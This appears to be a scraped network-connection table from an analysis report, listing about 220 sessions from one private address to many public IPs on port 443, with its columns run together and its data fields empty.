                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20580192.168.2.2346616203.217.182.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20581192.168.2.234698293.59.136.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20582192.168.2.235002090.70.75.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20583192.168.2.235608640.33.171.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20584192.168.2.234879247.130.62.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20585192.168.2.233311877.66.19.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20586192.168.2.2333314221.201.193.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20587192.168.2.2358296180.144.37.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20588192.168.2.233533044.32.215.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20589192.168.2.23606062.50.39.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20590192.168.2.2353542100.178.162.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20591192.168.2.23597505.46.183.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20592192.168.2.234389834.151.140.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20593192.168.2.2339906106.18.37.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20594192.168.2.2360156135.43.30.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20595192.168.2.2334580171.205.165.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20596192.168.2.235137441.212.13.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20597192.168.2.235198496.189.23.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20598192.168.2.2345392141.167.185.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20599192.168.2.234137041.197.152.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20600192.168.2.234603661.122.49.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20601192.168.2.2353120106.30.92.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20602192.168.2.2360170141.21.78.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20603192.168.2.233577431.20.165.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20604192.168.2.233523686.62.255.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20605192.168.2.2334036194.197.152.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20606192.168.2.2339686114.112.5.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20607192.168.2.2358388182.27.111.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20608192.168.2.2345038117.222.145.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20609192.168.2.2359304174.154.230.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20610192.168.2.2341070138.225.144.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20611192.168.2.2343178145.119.108.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20612192.168.2.2360208132.12.94.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20613192.168.2.2349628168.172.78.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20614192.168.2.235685012.85.48.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20615192.168.2.2347514189.193.215.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20616192.168.2.2342396202.255.56.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20617192.168.2.2353652182.22.14.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20618192.168.2.2334264167.254.100.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20619192.168.2.2341142170.253.50.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20620192.168.2.234349087.155.168.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20621192.168.2.2351786109.87.251.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20622192.168.2.2348306116.146.233.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20623192.168.2.2349996145.241.102.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20624192.168.2.233692491.17.32.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20625192.168.2.235398699.26.122.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20626192.168.2.2351638180.231.12.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20627192.168.2.2332944188.210.181.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20628192.168.2.2344774167.150.32.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20629192.168.2.235210858.197.140.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20630192.168.2.2357366164.40.61.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20631192.168.2.2346128157.254.123.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20632192.168.2.235861490.198.92.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20633192.168.2.233912067.212.241.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20634192.168.2.2342924162.16.86.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20635192.168.2.235965687.201.50.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20636192.168.2.2342522163.186.32.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20637192.168.2.2341258208.58.117.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20638192.168.2.2355852180.99.29.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20639192.168.2.2356772213.240.244.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20640192.168.2.235011087.94.24.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20641192.168.2.2347116223.146.32.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20642192.168.2.2350424129.123.188.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20643192.168.2.234434463.28.50.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20644192.168.2.23479504.222.72.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20645192.168.2.2337366149.171.209.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20646192.168.2.2359056136.66.136.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20647192.168.2.233531289.113.85.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20648192.168.2.2358444184.253.226.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20649192.168.2.23465261.134.239.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20650192.168.2.2337442125.71.114.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20651192.168.2.2355710185.229.26.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20652192.168.2.234763490.207.252.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20653192.168.2.2349972151.164.229.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20654192.168.2.2360130125.71.63.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20655192.168.2.2350088210.24.43.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20656192.168.2.2341860134.175.196.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20657192.168.2.2357490213.12.34.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20658192.168.2.2349868151.94.196.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20659192.168.2.2355132117.64.177.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20660192.168.2.2359562113.44.80.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20661192.168.2.2337852104.175.118.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20662192.168.2.234818687.129.112.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20663192.168.2.2352362205.135.64.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20664192.168.2.2333186179.167.79.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20665192.168.2.2341500206.90.19.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20666192.168.2.2354924193.135.55.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20667192.168.2.234161460.58.70.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20668192.168.2.2342048206.136.188.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20669192.168.2.234924638.242.212.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20670192.168.2.2355100100.148.15.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20671192.168.2.2345716115.199.155.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20672192.168.2.2348496161.104.110.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20673192.168.2.234903284.240.155.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20674192.168.2.2345452206.165.216.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20675192.168.2.236055035.235.145.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20676192.168.2.23478165.66.129.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20677192.168.2.2354486149.173.52.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20678192.168.2.2335950162.125.181.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20679192.168.2.2348478221.60.197.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20680192.168.2.234905234.153.196.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20681192.168.2.233945263.190.216.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20682192.168.2.2342394151.189.128.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20683192.168.2.2349446199.93.192.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20684192.168.2.2341792128.231.141.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20685192.168.2.2338310174.165.77.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20686192.168.2.233608657.27.178.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20687192.168.2.234207647.73.137.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20688192.168.2.234163661.232.211.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20689192.168.2.2341846179.133.165.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20690192.168.2.2348030138.110.181.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20691192.168.2.2344756138.173.193.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20692192.168.2.2339708220.32.83.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20693192.168.2.235205494.168.195.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20694192.168.2.2353908199.223.222.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20695192.168.2.234907470.63.40.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20696192.168.2.2340496204.22.232.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20697192.168.2.2349418216.95.88.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20698192.168.2.233889286.24.222.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20699192.168.2.234107023.134.82.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20700192.168.2.233537623.33.215.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20701192.168.2.2336364122.3.84.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20702192.168.2.235643257.230.65.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20703192.168.2.234686690.40.185.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20704192.168.2.2341528152.69.63.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20705192.168.2.235915260.200.26.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20706192.168.2.2337478195.121.202.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20707192.168.2.235259612.8.105.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20708192.168.2.2345848120.124.204.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20709192.168.2.235851276.29.67.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20710192.168.2.2340180211.61.66.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20711192.168.2.233773045.186.30.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20712192.168.2.235653691.25.187.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20713192.168.2.2347940115.13.17.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20714192.168.2.2360388125.215.71.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20715192.168.2.2351180219.220.130.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20716192.168.2.2344388197.128.179.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20717192.168.2.233487043.208.166.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20718192.168.2.2333566124.64.78.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20719192.168.2.235851232.73.44.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20720192.168.2.23421525.194.13.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20721192.168.2.236062694.215.54.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20722192.168.2.2347018128.12.251.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20723192.168.2.2334718118.22.133.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20724192.168.2.2343832156.64.200.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20725192.168.2.2351196175.96.226.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20726192.168.2.2350642162.64.230.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20727192.168.2.235006019.172.254.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20728192.168.2.2340636162.159.195.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20729192.168.2.235670432.100.128.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20730192.168.2.2352508109.166.60.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20731192.168.2.2358450206.19.158.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20732192.168.2.2349110126.16.254.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20733192.168.2.2355752139.205.202.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20734192.168.2.2360740181.154.198.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20735192.168.2.2348552222.36.131.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20736192.168.2.233597688.163.157.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20737192.168.2.2338014102.212.216.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20738192.168.2.2360332106.85.63.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20739192.168.2.2357640135.192.155.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20740192.168.2.2339782187.220.208.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20741192.168.2.2344514211.32.81.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20742192.168.2.235507823.253.173.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20743192.168.2.2338622118.142.159.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20744192.168.2.2352512100.236.99.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20745192.168.2.234606658.132.90.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20746192.168.2.2349380129.84.100.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20747192.168.2.2347656122.10.90.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20748192.168.2.2336408220.251.24.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20749192.168.2.2338512208.153.37.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20750192.168.2.234757834.77.38.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20751192.168.2.2345344138.80.147.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20752192.168.2.234656652.208.81.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20753192.168.2.2337104185.46.229.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20754192.168.2.2352576220.122.228.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20755192.168.2.233429679.30.236.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20756192.168.2.2359538123.67.177.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20757192.168.2.2347912163.82.117.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20758192.168.2.233411838.59.95.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20759192.168.2.2355216187.43.104.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20760192.168.2.2333932174.228.152.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20761192.168.2.234972292.103.93.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20762192.168.2.2343932169.250.239.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20763192.168.2.2360198218.24.111.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20764192.168.2.233359646.106.7.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20765192.168.2.2347464196.160.72.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20766192.168.2.2355314180.169.144.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20767192.168.2.234263863.149.28.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20768192.168.2.2335250194.97.139.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20769192.168.2.235834096.110.78.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20770192.168.2.235565623.10.240.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20771192.168.2.234108041.83.117.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20772192.168.2.2336464123.92.228.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20773192.168.2.23365401.171.222.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20774192.168.2.2334204145.185.22.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20775192.168.2.2340108199.47.96.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20776192.168.2.2352160212.145.102.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20777192.168.2.2342128139.189.112.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20778192.168.2.233997257.187.147.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20779192.168.2.2333802131.170.1.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20780192.168.2.2340170132.189.246.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20781192.168.2.234261886.76.152.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20782192.168.2.2334300198.188.148.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20783192.168.2.234949453.118.75.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20784192.168.2.233847669.98.34.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20785192.168.2.2335376109.89.86.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20786192.168.2.2348788159.13.106.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20787192.168.2.2360642104.144.62.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20788192.168.2.2354056143.198.80.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20789192.168.2.234324619.179.131.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20790192.168.2.2348690208.107.149.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20791192.168.2.2348076194.27.204.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20792192.168.2.2358062199.213.4.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20793192.168.2.2346898218.231.214.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20794192.168.2.235297290.200.218.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20795192.168.2.235615449.158.36.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20796192.168.2.234041647.7.160.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20797192.168.2.2353064149.95.28.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20798192.168.2.2339334158.174.168.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20799192.168.2.2342422165.172.162.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20800192.168.2.2356324206.38.40.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
